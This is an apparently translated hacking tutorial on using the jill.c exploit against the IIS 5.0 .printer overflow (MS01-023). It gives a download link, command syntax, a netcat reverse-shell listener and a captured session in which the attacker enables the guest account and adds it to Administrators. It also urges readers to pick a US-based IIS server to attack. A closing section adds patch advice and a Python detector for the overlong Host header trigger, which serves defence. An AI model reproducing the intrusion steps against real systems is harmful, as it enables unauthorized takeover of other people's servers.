Download: http://archives.neohapsis.com/archives/bugtraq/current/att-0024/01-jill.c

This vulnerability (the IIS 5.0 .printer ISAPI extension overflow found by eEye; Microsoft bulletin MS01-023, CVE-2001-0241) now has intrusion tools circulating online, and jill.c by dark spyrit is one of them. Here is how to use it:

1. Compile jill.c on a Unix-like system and read the usage notes once it builds. The general usage is:

#./jill <target host> <target IIS 5 port> <attacker host> <attacker listening port>

Nothing here needs explaining except the "attacker listening port". What does it mean? See below.

2. Start a netcat listener locally on any port:

D:\>nc -l -p xxx -vv
listening on [any] xxx ...

xxx is the port you want to listen on. Although this step is often described as "binding cmd.exe with nc", nothing is bound locally: the exploit payload starts cmd.exe on the target and connects back to <attacker host>:<attacker listening port>, so the listener only has to be up before jill runs, and the target must be able to reach that address (a private IP behind NAT with no port forwarding will never receive the shell). Once it is listening you can try the intrusion. Pick a US-based IIS 5 machine.

3. Start the listener, then launch the exploit.

Listener:

D:\>nc -l -p 199 -vv
listening on [any] 199 ...

Exploit:

# ./jill xxx.xxx.xx.xx 80 xx.xxx.xx.xx 199
iis5 remote .printer overflow.
dark spyrit / beavuh labs.
connecting...
sent...
you may need to send a carriage on your listener if the shell doesn't appear.
have fun!

The 199 above is the port I am listening on. Now look at the listener:

D:\>nc -l -p 199 -vv
listening on [any] 199 ...
xxx.xxx.xx.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [xx.xxx.xxx.xx] from (UNKNOWN) [xx.xxx.xxx.xx] 3631:NO_DATA
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT>net user guest /active
net user guest /active
The command completed successfully.

C:\WINNT>net localgroup administrators guest /add
net localgroup administrators guest /add
The command completed successfully.

Each command appears twice because the remote cmd.exe echoes what it reads from the socket. The shell runs with the IIS process's identity, LocalSystem, which is why a disabled guest account can be enabled and added to Administrators from it; note that the documented syntax for the first command is net user guest /active:yes. The fix is the MS01-023 patch, or removing the .printer application mapping in the IIS console if Internet Printing is not needed.

Hehe! Admin privileges! What can't you do? :) (GoGo)
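What jill actually sends is never visible in the nc session above: eEye described the trigger as a request for a .printer resource carrying an overlong Host header (about 420 bytes), which msw3prt.dll copies into a fixed stack buffer. As an added example that is not part of the original post or of jill.c, here is a small Python checker for that pattern run over constructed HTTP requests. The 255-byte alert threshold and the hostname-character check are my assumptions; the 420-byte sample size is the figure from eEye's advisory.

```python
# Added example: a minimal detector for the IIS 5 .printer overflow trigger.
# Not part of the original post or of jill.c; the requests below are constructed.
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Assumed alert threshold. eEye's advisory put the crash at a Host header of
# roughly 420 bytes; a legitimate Host value is a hostname plus an optional
# port, so anything past a couple of hundred bytes on a .printer request is
# already suspect.
HOST_LIMIT = 255

# Bytes that can legitimately appear in a Host header value (hostname, '.', '-',
# and the ':port' suffix). Shellcode in the header will not stay inside this set.
HOSTNAME_BYTES = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-:"
)


@dataclass
class Finding:
    request_line: str
    host_len: int
    reason: str


def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, bytes]]]:
    """Split a raw HTTP request into (method, path, headers).

    Header values stay as bytes because an exploit Host header carries
    shellcode, not text, and decoding it would hide that.
    """
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    method = parts[0].decode("ascii", "replace")
    path = parts[1].decode("ascii", "replace")
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return method, path, headers


def check_request(raw: bytes, host_limit: int = HOST_LIMIT) -> Optional[Finding]:
    """Return a Finding if the request looks like the msw3prt.dll overflow
    trigger: a .printer resource whose Host header is overlong or contains
    bytes that cannot be part of a hostname."""
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, headers = parsed
    # The ISAPI mapping is on the extension, so match it case-insensitively;
    # jill requests /NULL.printer, but any name with that extension is routed
    # to msw3prt.dll.
    if not path.split("?", 1)[0].lower().endswith(".printer"):
        return None
    host = headers.get("host", b"")
    request_line = f"{method} {path}"
    if len(host) > host_limit:
        return Finding(request_line, len(host),
                       f"Host header {len(host)} bytes > {host_limit}")
    if any(b not in HOSTNAME_BYTES for b in host):
        return Finding(request_line, len(host),
                       "Host header contains non-hostname bytes")
    return None


def scan(requests: Iterable[bytes]) -> List[Finding]:
    """Run check_request over a batch and keep only the hits."""
    return [f for f in (check_request(r) for r in requests) if f is not None]


# Constructed samples: two benign requests, then three shaped like the exploit.
SAMPLES = [
    b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    b"GET /printers/hp.printer HTTP/1.1\r\nHost: print.example.com:80\r\n\r\n",
    # jill-style trigger: .printer path, Host padded to the ~420 bytes eEye cited
    b"GET /NULL.printer HTTP/1.0\r\nHost: " + b"A" * 420 + b"\r\n\r\n",
    # same trigger with shellcode-like bytes and an upper-case extension
    b"GET /x.PRINTER HTTP/1.0\r\nHost: " + bytes(range(0x80, 0xFF)) + b"\r\n\r\n",
    # short Host, but a raw byte that no hostname contains
    b"GET /a.printer HTTP/1.0\r\nHost: \xeb\x10host\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(f"ALERT {finding.request_line}: {finding.reason}")
```

The check keys on the extension rather than on a fixed path because the mapping to msw3prt.dll is by extension; a threshold on the Host length alone would miss a short header stuffed with non-printable bytes, so both tests are applied. On a real sensor the same logic would run over reassembled request headers, not individual packets, since the overlong header can span TCP segments.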